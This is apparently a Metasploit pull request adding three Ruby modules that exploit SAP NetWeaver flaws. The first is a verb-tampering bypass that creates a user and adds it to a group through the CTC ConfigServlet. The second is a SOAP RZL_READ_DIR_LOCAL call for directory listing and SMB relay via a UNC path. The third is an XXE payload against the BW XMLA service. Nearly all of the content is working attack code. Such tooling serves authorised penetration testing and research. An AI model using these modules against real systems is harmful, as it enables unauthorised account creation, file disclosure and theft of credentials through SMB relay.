### PR TITLE
RZL_READ_DIR_LOCAL (directory listing and SMB relay)

### DIFF
--- a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_add_user_and_add_role.rb
+++ b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_add_user_and_add_role.rb
@@ -1,0 +1,81 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in
+# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
+# http://www.onapsis.com/research-free-solutions.php.
+# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
+# in producing the Metasploit modules and was happy to share his knowledge and
+# experience - a very cool guy.
+#
+# The following guys from ERP-SCAN deserve credit for their contributions -
+# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
+# Dmitry Evdokimov.
+#
+# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
+# who have Beta tested the modules and provided excellent feedback. Some people
+# just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name' => 'SAP CTC Service Verb Tampering (add user and add role)',
+			'Description' => %q{
+									This module exploits an authentication bypass vulnerability in SAP NetWeaver CTC service.
+									The service is vulnerable to verb tampering and allows for unauthorised user management.
+									SAP Note 1589525, 1624450 / DSECRG-11-041.
+								},
+			'References' => [['URL','http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/']],
+			'Author' => ['nmonkee'],
+			'License' => MSF_LICENSE
+			)
+
+		register_options([
+			OptString.new('USER', [true, 'Username', nil]),
+			OptString.new('PASS', [true, 'Password', nil]),
+			OptString.new('GROUP', [true, 'Group', nil])
+			], self.class)
+	end
+
+	def run_host(ip)
+		uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=' + datastore['USER'] + ',PASSWORD=' + datastore['PASS']
+		send_request(uri)
+		uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=' + datastore['USER'] + ',GROUPNAME=' + datastore['GROUP']
+		send_request(uri)
+	end
+
+	def send_request(uri)
+		begin
+			print_status("[SAP] #{rhost}:#{rport} - sending request")
+			res = send_request_raw({
+				'uri' => uri,
+				'method' => 'HEAD',
+				'headers' =>{
+					'Cookie' => 'sap-usercontext=sap-language=EN',
+					'Content-Type' => 'text/xml; charset=UTF-8',}
+				}, 45)
+			if res
+				if datastore['VERBOSE'] == true
+					print_status("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s)
+					print_status("[SAP] #{rhost}:#{rport} - Error title: " + res.message.to_s)
+					print_status("[SAP] #{rhost}:#{rport} - Error message: " + res.body.to_s)
+				end
+			end
+			rescue ::Rex::ConnectionError
+				print_error("#{rhost}:#{rport} - Unable to connect")
+				return
+			end
+		end
+	end

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir_local_dir_listing_and_smb_relay.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir_local_dir_listing_and_smb_relay.rb
@@ -1,0 +1,97 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in
+# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
+# http://www.onapsis.com/research-free-solutions.php.
+# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
+# in producing the Metasploit modules and was happy to share his knowledge and
+# experience - a very cool guy.
+#
+# The following guys from ERP-SCAN deserve credit for their contributions -
+# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
+# Dmitry Evdokimov.
+#
+# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
+# who have Beta tested the modules and provided excellent feedback. Some people
+# just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name' => 'RZL_READ_DIR_LOCAL (directory listing and SMB relay)',
+			'Description' => %q{
+								This module exploits the SAP NetWeaver RZL_READ_DIR_LOCAL Missing Authorization Check And SMB Relay Vulnerability.
+								SAP Note 1595074 / DSECRG-12-026.
+								RZL_READ_DIR_LOCAL returns the file names in a given directory. It returns only the first 32 characters of a filename (truncated).
+								},
+			'References' => [['URL','http://erpscan.com/advisories/dsecrg-12-026-sap-netweaver-rzl_read_dir_local-missing-authorization-check-and-smb-relay-vulnerability/']],
+			'Author' => ['nmonkee'],
+			'License' => MSF_LICENSE
+			)
+
+		register_options([
+			OptString.new('CLIENT', [true, 'SAP client', nil]),
+			OptString.new('USER', [true, 'Username', nil]),
+			OptString.new('PASS', [true, 'Password', nil]),
+			OptString.new('PATH',[true,'File path (e.g. \\xx.xx.xx.xx\share)','c:\\'])
+			], self.class)
+	end
+
+	def run_host(ip)
+		data = '<?xml version="1.0" encoding="utf-8" ?>'
+		data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  '
+		data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  '
+		data << 'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">'
+		data << '<SOAP-ENV:Header/>'
+		data << '<SOAP-ENV:Body>'
+		data << '<RZL_READ_DIR_LOCAL xmlns="urn:sap-com:document:sap:rfc:functions">'
+		data << '<FILE_TBL>'
+		data << '<item>'
+		data << '<NAME></NAME>'
+		data << '<SIZE></SIZE>'
+		data << '</item>'
+		data << '</FILE_TBL>'
+		data << '<NAME>' + datastore['PATH'] + '</NAME>'
+		data << '</RZL_READ_DIR_LOCAL>'
+		data << '</SOAP-ENV:Body>'
+		data << '</SOAP-ENV:Envelope>'
+		user_pass = Rex::Text.encode_base64(datastore['USER'] + ":" + datastore['PASS'])
+		begin
+			print_status("[SAP] #{ip}:#{rport} - sending request for #{datastore['PATH']}")
+			res = send_request_raw({
+				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+				'method' => 'POST',
+				'data' => data,
+				'headers' =>{
+					'Content-Length' => data.size.to_s,
+					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+					'Authorization' => 'Basic ' + user_pass,
+					'Content-Type' => 'text/xml; charset=UTF-8',}
+					}, 45)
+			if res
+				if datastore['VERBOSE'] == true
+					print_status("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s)
+					print_status("[SAP] #{rhost}:#{rport} - Error title: " + res.message.to_s)
+					print_status("[SAP] #{rhost}:#{rport} - Error message: " + res.body.to_s)
+				end
+			end
+			rescue ::Rex::ConnectionError
+				print_error("#{rhost}:#{rport} - Unable to connect")
+				return
+			end
+		end
+	end

--- a/modules/auxiliary/scanner/sap/sap_soap_xmla_bw_smb_relay.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_xmla_bw_smb_relay.rb
@@ -1,0 +1,85 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in
+# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
+# http://www.onapsis.com/research-free-solutions.php.
+# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
+# in producing the Metasploit modules and was happy to share his knowledge and
+# experience - a very cool guy.
+#
+# The following guys from ERP-SCAN deserve credit for their contributions -
+# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
+# Dmitry Evdokimov.
+#
+# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
+# who have Beta tested the modules and provided excellent feedback. Some people
+# just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name' => 'SAP /sap/bw/xml/soap/xmla XMLA service (XML DOCTYPE) SMB relay',
+			'Description' => %q{
+				This module exploits the SAP NetWeaver BW XML External Entity vulnerability.
+				An XML External Entities (XXE) issue exists within the XMLA service (XML DOCTYPE) function.
+				The XXE vulnerability in SAP BW can lead to arbitary file reading or an SMBRelay attack.
+				SAP Note 1597066 / DSECRG-12-033.
+				},
+			'References' => [['URL','http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity/']],
+			'Author' => ['nmonkee'],
+			'License' => MSF_LICENSE
+			)
+
+		register_options([
+			OptString.new('CLIENT', [true, 'SAP client', nil]),
+			OptString.new('USER', [true, 'Username', nil]),
+			OptString.new('PASS', [true, 'Password', nil]),
+			OptString.new('PATH',[true,'File path (e.g. \\xx.xx.xx.xx\share)',nil])
+			], self.class)
+	end
+
+	def run_host(ip)
+		data = '<?xml version="1.0" encoding="utf-8" ?>'
+		data = '<!DOCTYPE root ['
+		data << '<!ENTITY foo SYSTEM "' + datastore['PATH'] + '">'
+		data << ']>'
+		data << '<in>&foo;</in>'
+		user_pass = Rex::Text.encode_base64(datastore['USER'] + ":" + datastore['PASS'])
+		begin
+			print_status("[SAP] #{ip}:#{rport} - sending request for #{datastore['PATH']}")
+			res = send_request_raw({
+				'uri' => '/sap/bw/xml/soap/xmla?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+				'method' => 'POST',
+				'data' => data,
+				'headers' =>{
+					'Content-Length' => data.size.to_s,
+					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+					'Authorization' => 'Basic ' + user_pass,
+					'Content-Type' => 'text/xml; charset=UTF-8',}
+					}, 45)
+			if res
+				if datastore['VERBOSE'] == true
+					print_status("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s)
+					print_status("[SAP] #{rhost}:#{rport} - Error title: " + res.message.to_s)
+					print_status("[SAP] #{rhost}:#{rport} - Error message: " + res.body.to_s)
+				end
+			end
+			rescue ::Rex::ConnectionError
+				print_error("#{rhost}:#{rport} - Unable to connect")
+				return
+			end
+		end
+	end


### PR DESCRIPTION
This module exploits the SAP NetWeaver RZL_READ_DIR_LOCAL Missing Authorisation Check And SMB Relay Vulnerability. RZL_READ_DIR_LOCAL returns the file names in a given directory. It returns only the first 32 characters of a filename (truncated).

SAP Note 1595074 / DSECRG-12-026.

ref: http://erpscan.com/advisories/dsecrg-12-026-sap-netweaver-rzl_read_dir_local-missing-authorization-check-and-smb-relay-vulnerability/
